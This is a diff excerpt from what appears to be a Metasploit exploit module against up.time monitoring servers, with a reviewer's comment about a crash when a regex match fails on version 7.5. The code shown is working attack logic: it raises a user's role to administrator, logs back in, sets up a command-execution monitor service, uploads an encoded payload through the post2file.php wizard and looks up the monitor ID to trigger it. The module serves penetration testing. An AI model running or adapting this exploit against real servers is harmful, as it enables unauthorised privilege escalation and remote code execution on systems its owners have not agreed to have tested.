modules/exploits/multi/http/uptime_file_upload_2.rb

```diff
@@ -0,0 +1,367 @@
+          'landingpage' => 'MyPortal',
+          'isonvacation' => '0',
+          'receivealerts' => '0',
+          'activexgraphs' => '0',
+          'newuser' => 'on',
+          'newuser' => '1',
+          'userroleid' => '1',
+          'usergroupid[]' => '1'
+        }
+      )
+
+      # Refresing perms
+      vprint_status('Refresing perms...')
+      res_priv = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, 'index.php?loggedout'),
+        'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
+      )
+
+      res_auth = send_request_cgi(
+        'method' => 'POST',
+        'uri'    => normalize_uri(target_uri.path, 'index.php'),
+        'vars_post' => {
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD']
+        }
+      )
+      if res_auth && res_auth.get_cookies =~ /login=true/
+        cookie = Regexp.last_match(1)
+        cookie_split = res_auth.get_cookies.split(';')
+        vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
+        print_good('Priv. Escalation success')
+      end
+
+      # CREATING Linux EXEC Service
+      if res_auth && res_auth.headers['Server'] =~ /Unix/
+        vprint_status('Creating Linux Monitor Code exec...')
+        create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
+
+      else
+        # CREATING Windows EXEC Service#
+        vprint_status('Creating Windows Monitor Code exec...')
+        create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
+      end
+
+      # Upload file
+      vprint_status('Uploading file...')
+      send_request_cgi(
+        'method' => 'POST',
+        'uri'    => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
+        'vars_post' => {
+          'file_name' => "#{phpfile_name}.txt",
+          'script'    => payload.encoded
+        }
+      )
+
+      vprint_status('Checking Uploaded file...')
+      res_up_check = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
+      )
+
+      if res_up_check && res_up_check.code == 200
+        print_good("File found: #{phpfile_name}")
+      else
+        print_error('File not found')
+      end
+
+      # Get Monitor ID
+
+      vprint_status('Fetching Monitor ID...')
+      res_mon_id = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'),
+        'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
+        'vars_get' => {
+          'query'               => 'GET_SERVICE_PAGE_ERDC_LIST',
+          'iDisplayStart'       => '0',
+          'iDisplayLength'      => '10',
+          'sSearch'             => 'Exploit'
+        }
+       )
+
+      matchdata = res_mon_id.body.match(/id=?[^>]*>/)
+      mon_get_id = matchdata[0].gsub(/[^\d]/, '')
```

Comment:
I don't think we should assume matchdata matches - we could check that matchdata != nil. 
on up.time 7.5, I'm getting the following:
Exploit failed: NoMethodError undefined method `[]' for nil:NilClass